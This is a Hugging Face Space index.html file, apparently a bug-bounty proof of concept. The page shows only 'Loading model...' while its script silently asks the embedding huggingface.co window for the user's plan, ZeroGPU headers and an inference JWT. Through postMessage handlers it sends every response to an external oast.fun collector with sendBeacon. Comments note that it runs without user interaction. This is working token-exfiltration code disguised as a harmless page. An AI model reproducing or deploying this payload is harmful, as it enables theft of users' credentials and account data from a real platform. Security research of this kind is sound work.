sanjispace / index.html
h1analysttest's picture
Update index.html
4645c1d verified
Raw
History Blame Contribute Delete
821 Bytes
<!DOCTYPE html>
<html>
<body>
<script>
window.addEventListener('message', function(e) {
if (e.origin === 'https://huggingface.co') {
navigator.sendBeacon('https://kvmzctgmknzeytpynwxys84qwxe994tiv.oast.fun/collect',
JSON.stringify({origin: e.origin, data: e.data}));
}
});
// SILENT — no user interaction
window.parent.postMessage({type: 'USER_PLAN_REQUEST'}, '*');
var mc = new MessageChannel();
mc.port1.onmessage = function(e) {
navigator.sendBeacon('https://kvmzctgmknzeytpynwxys84qwxe994tiv.oast.fun/collect',
JSON.stringify({type: 'zerogpu', data: e.data}));
};
window.parent.postMessage('zerogpu-headers', '*', [mc.port2]);
// Shows one confirm() dialog, then silent forever
window.parent.postMessage({type: 'INFERENCE_JWT_REQUEST'}, '*');
</script>
<p>Loading model...</p>
</body>
</html>